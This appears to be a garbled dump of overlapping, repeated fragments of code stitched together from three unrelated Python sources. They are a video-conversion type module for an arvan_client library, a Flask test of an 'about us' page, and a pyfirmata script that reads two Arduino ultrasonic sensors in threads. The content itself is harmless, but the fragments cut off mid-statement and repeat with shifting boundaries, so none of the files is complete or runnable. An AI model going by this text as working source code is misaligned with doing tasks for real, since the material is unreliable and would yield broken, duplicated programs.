self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if", "if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']:", "in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return", "completed_at: str parallel_convert: int directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist:", "del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def", "thumbnail_time: int 
status: str job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at:", "int status: str job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str", "'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return self.title", "kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return self.title def __repr__(self):", "# channel: Channel def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info = []", "hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str player_url: str #", "if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or", "description: str file_info: FileInfo thumbnail_time: int status: str job_status_url: str available: bool convert_mode:", "player_url: str # channel: Channel def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info", "format: str bit_rate: int size: int class Video(DynamicType): codec: str width: int height:", "del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio']", "from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate:", "if 'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def", "= self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType):", "resolution: str def __str__(self): return self.resolution class Video(DynamicType): video_id: str title: str description:", "return self.general.format or 
super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def", "kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video", "str channel_layout: str def __init__(self, **kwargs): self.general = None self.video = None self.audio", "codec: str sample_rate: str bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general =", "List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str player_url: str", "__str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str", "Video(DynamicType): video_id: str title: str description: str file_info: FileInfo thumbnail_time: int status: str", "in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if", "= self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio'])", "in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if kwargs['video']:", "kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format", "if 'convert_info' in kwargs: self.convert_info = [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'],", "class General(DynamicType): duration: int format: str bit_rate: int size: int class Video(DynamicType): codec:", "None self.audio = None if 'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general']", "__init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info = [] if 'convert_info' in kwargs:", "self.Audio(**kwargs['audio']) del kwargs['audio'] 
super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate:", "if 'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio'", "str completed_at: str parallel_convert: int directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str", "convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos']", "typing import List from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int", "int height: int frame_rate: str bit_rate: str class Audio(DynamicType): codec: str sample_rate: str", "del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int", "'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info']", "video_url: str player_url: str # channel: Channel def __init__(self, **kwargs): if 'convert_info' in", "[] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info))", "DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate: int size: int", "kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id')", "'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id']", "bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert: int", "sample_rate: str 
bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general = None self.video", "str description: str file_info: FileInfo thumbnail_time: int status: str job_status_url: str available: bool", "width: int height: int frame_rate: str bit_rate: str class Audio(DynamicType): codec: str sample_rate:", "str player_url: str # channel: Channel def __init__(self, **kwargs): if 'convert_info' in kwargs:", "str video_url: str player_url: str # channel: Channel def __init__(self, **kwargs): if 'convert_info'", "kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs)", "isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs:", "str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str", "duration: int format: str bit_rate: int size: int class Video(DynamicType): codec: str width:", "del kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video']", "__init__(self, **kwargs): self.general = None self.video = None self.audio = None if 'general'", "str file_info: FileInfo thumbnail_time: int status: str job_status_url: str available: bool convert_mode: str", "int size: int class Video(DynamicType): codec: str width: int height: int frame_rate: str", "str sample_rate: str bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general = None", "self.general = None self.video = None self.audio = None if 'general' in kwargs:", "Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general", "= kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return self.title def __repr__(self): return self.__str__()", 
"codec: str width: int height: int frame_rate: str bit_rate: str class Audio(DynamicType): codec:", "from typing import List from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration:", "if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return", "if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del", "height: int frame_rate: str bit_rate: str class Audio(DynamicType): codec: str sample_rate: str bit_rate:", "'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if", "if 'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs:", "List from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format: str", "str title: str description: str file_info: FileInfo thumbnail_time: int status: str job_status_url: str", "kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return self.title def __repr__(self): return", "kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate:", "in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return self.title def", "in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs:", "mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str player_url:", "kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: 
self.audio", "self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del", "FileInfo thumbnail_time: int status: str job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo]", "str parallel_convert: int directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str", "FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate: int size: int class Video(DynamicType):", "config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str video_url:", "if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in", "= None self.audio = None if 'general' in kwargs: self.general = self.General(**kwargs['general']) del", "Channel def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info = [] if 'convert_info'" ]
[]
[ "AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to", "effort was made under the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\",", "= self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to giving you the very", "def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to giving", "our service.\", response.data, ) self.assertIn( b\"This website is created by students of DA-IICT", "Gujrat).\", response.data, ) self.assertIn( b\"This effort was made under the guidence of Prof.", "response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\",", "response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance engineer\",", "of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\",", "self.assertIn( b\"This effort was made under the guidence of Prof. 
<NAME>.\", response.data, )", "you the very best of our service.\", response.data, ) self.assertIn( b\"This website is", "best of our service.\", response.data, ) self.assertIn( b\"This website is created by students", "Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\",", "response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data)", "designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance", "self.assertIn( b\"This website is created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, )", ") self.assertIn( b\"This website is created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data,", "service.\", response.data, ) self.assertIn( b\"This website is created by students of DA-IICT (Gandhinagar,", "[201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance engineer\", response.data) self.assertIn(b\"Team", "test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to giving you", "by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was made", "created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was", "SetNow, We're dedicated to giving you the very best of our service.\", response.data,", "<NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", 
response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME>", "self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance engineer\", response.data) self.assertIn(b\"Team Back-end\", response.data)", "to SetNow, We're dedicated to giving you the very best of our service.\",", "We're dedicated to giving you the very best of our service.\", response.data, )", "is created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort", "from test.main.base_classes import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response", "self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME>", "BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn(", "class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated", "self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX", "flaskapp import models from test.main.base_classes import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser):", "models from test.main.base_classes import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self):", "dedicated to giving you the very best of our service.\", response.data, ) self.assertIn(", "to giving you the very best of our service.\", response.data, ) 
self.assertIn( b\"This", "was made under the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data)", "response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance engineer\", response.data) self.assertIn(b\"Team Back-end\",", "of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was made under the", "b\"This effort was made under the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our", "made under the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME>", "response.data, ) self.assertIn( b\"This effort was made under the guidence of Prof. <NAME>.\",", "very best of our service.\", response.data, ) self.assertIn( b\"This website is created by", "import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow,", "guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX", "self.assertIn( b\"Welcome to SetNow, We're dedicated to giving you the very best of", "[201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\",", "the guidence of Prof. 
<NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data)", "response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data)", "the very best of our service.\", response.data, ) self.assertIn( b\"This website is created", "DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was made under the guidence", "under the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\",", "test.main.base_classes import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response =", "test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to", "self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to giving you the very best", "b\"This website is created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn(", "students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was made under", "from flaskapp import models from test.main.base_classes import BaseUser from test.main.utils import test_post_request class", "self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance engineer\", response.data)", ") self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data)", "giving you the very best of our service.\", response.data, ) 
self.assertIn( b\"This website", "b\"Welcome to SetNow, We're dedicated to giving you the very best of our", "response.data, ) self.assertIn( b\"This website is created by students of DA-IICT (Gandhinagar, Gujrat).\",", "import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\")", "from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome", "test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're", "website is created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This", "of our service.\", response.data, ) self.assertIn( b\"This website is created by students of", "(Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was made under the guidence of", ") self.assertIn( b\"This effort was made under the guidence of Prof. <NAME>.\", response.data,", "response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to giving you the", "Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data)", "self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality", "import models from test.main.base_classes import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def" ]
[ "digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1)", "set pins class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino", "1: port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1,", "Arduino(port) define board print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ## Note: Echo", "= board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ### End set pins class", "datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1:", "ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance:", "distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1: Time:", "= ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1: Time: {0}ms,", "pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import time ### Start", "Thread from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import time", "Arduino() # or Arduino(port) define board print(\"Communication successfully started!\") it = util.Iterator(board) it.start()", "board = Arduino() # or Arduino(port) define board print(\"Communication successfully started!\") it =", "it = util.Iterator(board) it.start() ## Note: Echo and Trigger pins connected to the", "board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8", "time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet distance = ping_time_to_distance(time)", "sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital", "port 7 
text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1)", "Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8", "text def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms ->", "run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet", "pins class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text", "import time ### Start of pin configuration board = Arduino() # or Arduino(port)", "util.Iterator(board) it.start() ## Note: Echo and Trigger pins connected to the same ports", "def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see", "board print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ## Note: Echo and Trigger", "inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\" inicioEcho2", "connected to the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT", "= \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2:", "8 OUTPUT time.sleep(1) ### End set pins class Echo(Thread): def __init__ (self, echoPino,", "{1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2:", "pin 8 OUTPUT time.sleep(1) ### End set pins class Echo(Thread): def __init__ (self,", "or Arduino(port) define board print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ## Note:", "import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import time ### Start of", "print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\"", "# or Arduino(port) define board print(\"Communication successfully 
started!\") it = util.Iterator(board) it.start() ##", "End set pins class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino =", "configuration board = Arduino() # or Arduino(port) define board print(\"Communication successfully started!\") it", "## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT", "### End set pins class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino", "class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text =", "text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text def run(self): while True: time", "{0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2", "<reponame>BosonsHiggs/arduPython ## See Figures/two_ultrassonics_thread.png from threading import Thread from pyfirmata import Arduino, pyfirmata,", "pyfirmata.util import ping_time_to_distance import time ### Start of pin configuration board = Arduino()", "threading import Thread from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance", "7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ### End", "pyfirmata, util from pyfirmata.util import ping_time_to_distance import time ### Start of pin configuration", "= text def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms", "text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar", "##Sonar 2: port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\" inicioEcho2 =", "OUTPUT time.sleep(1) ### End set pins class Echo(Thread): def __init__ (self, echoPino, text:str=None):", "import Thread from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import", 
"= echoPino self.text = text def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06)", "Note: Echo and Trigger pins connected to the same ports sonarEcho1 = board.get_pin('d:7:o')", "= Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2: Time: {0}ms,", "ping_time_to_distance import time ### Start of pin configuration board = Arduino() # or", "it.start() ## Note: Echo and Trigger pins connected to the same ports sonarEcho1", "while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet distance", "OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ### End set", "2: port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\" inicioEcho2 = Echo(sonarEcho2,", "pins connected to the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7", "import ping_time_to_distance import time ### Start of pin configuration board = Arduino() #", "Echo and Trigger pins connected to the same ports sonarEcho1 = board.get_pin('d:7:o') ##", "sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ### End set pins", "self.text = text def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of", "inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2: Time:", "Figures/two_ultrassonics_thread.png from threading import Thread from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util", "Thread.__init__(self) self.echoPino = echoPino self.text = text def run(self): while True: time =", "to the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2", "### Start of pin configuration board = Arduino() # or Arduino(port) define board", "the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 =", "60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) 
##Sonar 1: port 7", "= Arduino() # or Arduino(port) define board print(\"Communication successfully started!\") it = util.Iterator(board)", "Start of pin configuration board = Arduino() # or Arduino(port) define board print(\"Communication", "= util.Iterator(board) it.start() ## Note: Echo and Trigger pins connected to the same", "= self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time,", "See Figures/two_ultrassonics_thread.png from threading import Thread from pyfirmata import Arduino, pyfirmata, util from", "## digital pin 8 OUTPUT time.sleep(1) ### End set pins class Echo(Thread): def", "from threading import Thread from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import", "Trigger pins connected to the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin", "board.pass_time(0.06) #delay of 60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar", "Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance:", "text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\"", "from pyfirmata.util import ping_time_to_distance import time ### Start of pin configuration board =", "of pin configuration board = Arduino() # or Arduino(port) define board print(\"Communication successfully", "util from pyfirmata.util import ping_time_to_distance import time ### Start of pin configuration board", "__init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text def run(self):", "from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import time ###", "digital pin 8 OUTPUT time.sleep(1) ### End set pins class Echo(Thread): def __init__", "pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT 
time.sleep(1) ###", "#delay of 60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1:", "time ### Start of pin configuration board = Arduino() # or Arduino(port) define", "see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 =", "echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text def run(self): while True:", "##Sonar 1: port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 =", "and Trigger pins connected to the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital", "print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ## Note: Echo and Trigger pins", "distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1", "(self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text def run(self): while", "Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import time ### Start of pin", "## See Figures/two_ultrassonics_thread.png from threading import Thread from pyfirmata import Arduino, pyfirmata, util", "successfully started!\") it = util.Iterator(board) it.start() ## Note: Echo and Trigger pins connected", "self.echoPino = echoPino self.text = text def run(self): while True: time = self.echoPino.ping()", "port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\" inicioEcho2 = Echo(sonarEcho2, text_sonar2)", "## Note: Echo and Trigger pins connected to the same ports sonarEcho1 =", "8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\" inicioEcho2 = Echo(sonarEcho2, 